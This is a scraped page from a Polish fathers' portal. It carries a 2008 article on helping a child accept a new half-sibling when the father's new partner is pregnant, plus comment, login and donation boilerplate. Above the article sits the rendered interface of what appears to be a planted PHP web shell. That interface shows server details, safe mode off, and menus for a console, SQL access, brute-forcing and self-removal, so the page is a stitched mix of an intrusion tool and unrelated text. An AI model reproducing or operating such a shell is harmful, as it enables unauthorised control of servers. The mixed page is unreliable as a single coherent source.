W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:28:59
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Gdy macocha i tata mają dzieci
28.08.2008.
Udało ci się założyć nową rodzinę, relacje twojego dziecka z macochą układają się coraz lepiej, czasem spędzacie czas we trójkę. Dziecko oswoiło się z nową sytuacją a ty masz kolejne wątpliwości – mówić czy nie mówić o tym, że twoja nowa partnerka jest w ciąży?! Zastanawiasz się jakie będą relacje z dzieckiem gdy będzie miał / miała nowe rodzeństwo. Postaw się w sytuacji twojego dziecka, najpierw przeżyło rozstanie rodziców, potem musiało się pogodzić z tym , że jego lub jej matka nie jest twoją jedyną kobietą, a teraz kolejny wyzwanie – nowy braciszek lub siostrzyczka. Nie jest łatwo…
Czego obawia się twoje dziecko najbardziej? Przede wszystkim odrzucenia, dziecko boi się o swoją pozycję, obawia się, że będziesz je mniej kochał, nie będziesz dla niego miał czasu.
Co zrobić by pomóc dziecku zrozumieć i odnaleźć się w nowej sytuacji? Po pierwsze koniecznie powiedz o ty, że twoja partnerka jest w ciąży! Nie ma nic gorszego niż zaskoczenie rosnącym brzuchem macochy. W zależności od tego jaki masz kontakt z dzieckiem i w jakich ono jest relacjach z macochą postaraj się by dziecko uczestniczyło w przygotowaniach do pojawianie się nowego członka rodziny. Dziecko może pomóc w przygotowaniach pokoiku dla małego braciszka, może razem w wami wybierać wózek dla małej siostrzyczki. Ponadto bardzo ważne jest by zapewniać dziecko o swojej miłości do niego, mówić o tym, że będziemy mieli dalej dla niego czas – a co najważniejsze pamiętać by dotrzymać składanych obietnic!
Dobrym sposobem na oswojenie dziecka z tym, że będzie miało nowe rodzeństwo jest opowieść o tym jak to w dzieciństwie mieliśmy ulubionego i najukochańszego pieska, jak myśleliśmy, że kochamy go najbardziej na świecie. Pewnego razu znaleźliśmy chorego kotka, przygarnęliśmy go i okazało się, że potrafimy kochać tak samo mocno zarówno pieska jak i małego kotka. Okazało się, że w naszym sercu jest tyle miłości, że wystarczy dla wszystkich członków „rodziny”. Ta prosta opowieść pozwoli dziecku lepiej zrozumieć, to że po urodzeniu nowego braciszka czy siostrzyczki nie utraci naszej miłości.
Jeżeli pomimo naszych starań nasze dziecko nie chce zaakceptować faktu, że będzie miało „nowe” rodzeństwo, nie starajmy się robić nic na siłę. Pamiętajmy o tym by wygospodarować obiecany czas i spędzać go sam na sam z naszym „starym” dzieckiem. Jeżeli dziecko zauważy, że jest dla nas dalej ważne z czasem przyzwyczai się do nowej sytuacji.
By ułatwić dziecku przyzwyczajenie się do nowej sytuacji można sięgnąć do wspólnych wspomnień o tym gdy nasz maluch był słodkim bobasem, szczególnie w przypadku małych dzieci takie przykłady z ich życia świetnie działają na ich wyobraźnie i pomagają w akceptacji rodzeństwa. W przypadku dzieci starszych i nastolatków weźmy „poprawkę” na ich buntowniczy okres i nie oczekujmy od razu propozycji przypilnowania oseska w piątkowy wieczór!
Ważne by dziecko dowiadywało się od nas (w przystępny dla jego wieku sposób) o ważnych wydarzeniach czy zmianach w naszym życiu – jedną z takich zmian z pewnością są narodziny nowego brata czy siostry.
Dota Szymborska redaktor naczelna portalu www.wczesnaedukacja.com
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


17.07.2018.